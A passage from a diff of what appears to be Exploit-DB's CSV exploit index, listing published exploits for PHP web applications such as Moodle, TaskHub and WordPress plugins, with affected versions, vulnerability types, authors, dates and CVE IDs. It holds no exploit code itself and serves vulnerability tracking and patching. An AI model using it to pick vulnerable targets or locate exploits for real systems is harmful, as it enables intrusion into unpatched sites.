 51820,exploits/php/webapps/51820.txt,"Moodle 4.3 - Insecure Direct Object Reference",2024-02-27,tmrswrr,webapps,php,,2024-02-27,2024-02-27,0,,,,,,
 51821,exploits/php/webapps/51821.txt,"Moodle 4.3 - Reflected XSS",2024-02-27,tmrswrr,webapps,php,,2024-02-27,2024-02-27,0,,,,,,
 8297,exploits/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",webapps,php,,2009-03-26,,1,OSVDB-52998;CVE-2009-1171,,,,,
 28770,exploits/php/webapps/28770.txt,"Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection",2006-10-08,disfigure,webapps,php,,2006-10-08,2013-10-07,1,CVE-2006-5219;OSVDB-29573,,,,,https://www.securityfocus.com/bid/20395/info
 47177,exploits/php/webapps/47177.txt,"Moodle Filepicker 3.5.2 - Server Side Request Forgery",2019-07-26,"Fabian Mosch_ Nick Theisinger",webapps,php,80,2019-07-26,2019-07-26,0,CVE-2018-1042,"Server-Side Request Forgery (SSRF)",,,http://www.exploit-db.commoodle-3.5.2.tar.gz,
@ -30566,7 +30567,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 16158,exploits/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2011-02-12,0,CVE-2011-1062;OSVDB-70932;OSVDB-70878;OSVDB-70877,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4990
 51810,exploits/php/webapps/51810.txt,"taskhub 2.8.7 - SQL Injection",2024-02-26,CraCkEr,webapps,php,,2024-02-26,2024-02-26,0,,,,,,
 51692,exploits/php/webapps/51692.txt,"Taskhub CRM Tool 2.8.6 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
 51782,exploits/php/webapps/51782.txt,"TASKHUB-2.8.8 - XSS-Reflected",2024-02-05,nu11secur1ty,webapps,php,,2024-02-05,2024-02-05,0,,,,,,
 15269,exploits/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,webapps,php,,2010-10-17,2015-04-17,0,,,,,,
 34809,exploits/php/webapps/34809.txt,"Tausch Ticket Script 3 - 'suchauftraege_user.php?userid' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55691,,,,,https://www.securityfocus.com/bid/43710/info
 34810,exploits/php/webapps/34810.txt,"Tausch Ticket Script 3 - 'vote.php?descr' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55692,,,,,https://www.securityfocus.com/bid/43710/info
@ -32738,6 +32738,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47295,exploits/php/webapps/47295.html,"WordPress Plugin Add Mime Types 2.2.1 - Cross-Site Request Forgery",2019-08-20,"Princy Edward",webapps,php,,2019-08-20,2019-08-20,0,,,,,http://www.exploit-db.comwp-add-mime-types.2.2.1.zip,
 46066,exploits/php/webapps/46066.txt,"WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection",2019-01-02,Kaimi,webapps,php,80,2019-01-02,2019-01-02,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comadicons.zip,
 38537,exploits/php/webapps/38537.txt,"WordPress Plugin ADIF Log Search Widget - 'logbook_search.php' Cross-Site Scripting",2013-05-27,k3170makan,webapps,php,,2013-05-27,2015-10-27,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/60198/info
 51831,exploits/php/webapps/51831.txt,"WordPress Plugin Admin Bar & Dashboard Access Control Version: 1.2.8 - _Dashboard Redirect_ field Stored Cross-Site Scripting (XSS)",2024-02-28,"Rachit Arora",webapps,php,,2024-02-28,2024-02-28,0,,,,,,
 38966,exploits/php/webapps/38966.txt,"WordPress Plugin Admin Management Xtended 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",webapps,php,80,2015-12-14,2015-12-14,0,OSVDB-131818,"WordPress Plugin",,,,
 43486,exploits/php/webapps/43486.txt,"WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation",2018-01-10,"Panagiotis Vagenas",webapps,php,80,2018-01-10,2018-01-10,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comadmin-menu-tree-page-view.2.6.9.zip,
 50845,exploits/php/webapps/50845.txt,"WordPress Plugin admin-word-count-column 2.2 - Local File Read",2022-03-30,"Hassan Khan Yusufzai",webapps,php,,2022-03-30,2022-03-30,0,,,,,,
@ -34004,6 +34005,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,,
 51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-06-09,1,CVE-2022-1565,,,,,
 51560,exploits/php/webapps/51560.txt,"WP AutoComplete 1.0.4 - Unauthenticated SQLi",2023-07-03,matitanium,webapps,php,,2023-07-03,2023-07-03,0,CVE-2022-4297,,,,,
 51835,exploits/php/webapps/51835.txt,"WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection",2024-02-28,"Meryem Taşkın",webapps,php,,2024-02-28,2024-02-28,0,,,,,,
 51830,exploits/php/webapps/51830.py,"WP Rocket < 2.10.3 - Local File Inclusion (LFI)",2024-02-28,"E1 Coders",webapps,php,,2024-02-28,2024-02-28,0,,,,,,
 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,,
 51711,exploits/php/webapps/51711.py,"WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)",2023-09-04,psychoSherlock,webapps,php,,2023-09-04,2023-09-04,0,CVE-2022-25148,,,,,
 51533,exploits/php/webapps/51533.py,"WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-3320,,,,,